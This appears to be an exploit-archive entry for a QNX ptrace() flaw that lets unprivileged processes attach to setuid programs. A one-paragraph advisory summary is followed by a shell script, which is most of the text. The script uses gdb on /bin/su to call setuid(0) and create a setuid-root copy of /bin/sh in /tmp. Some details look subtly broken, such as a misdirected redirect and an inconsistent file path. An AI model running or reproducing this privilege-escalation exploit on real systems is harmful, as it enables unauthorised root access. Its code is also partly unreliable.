No description provided by source.
source: http://www.securityfocus.com/bid/4919/info The QNX implementation of 'ptrace()' is reportedly insecure. An unprivileged process may attach to a setuid program without restriction. Since the attaching process may view or edit memory, an attacker may exploit this issue to escalate privileges. This issue affects QNX RTOS 6 prior to 6.4.0. #!/bin/sh #include <std_shouts.h> #include <std_disclaimer.h> #http://www.badc0ded.com echo "#!/bin/sh" > /tmp/runme echo cp /bin/sh /tmp/sh > /tmp/runme echo chmod 4755 /tmp/sh >> /tmp/runme chmod 755 /tmp/runme echo r root -c /tmp/runme > /tmp/badc0ded echo break *main+44 >> /tmp/badc0ded echo c >> /tmp/badc0ded echo "call setuid(0)" >> /tmp/badc0ded echo c >> /tmp/badc0ded gdb /bin/su < badc0ded > /dev/null echo "www.badc0ded.com" sleep 1 rm /tmp/runme /tmp/badc0ded /tmp/sh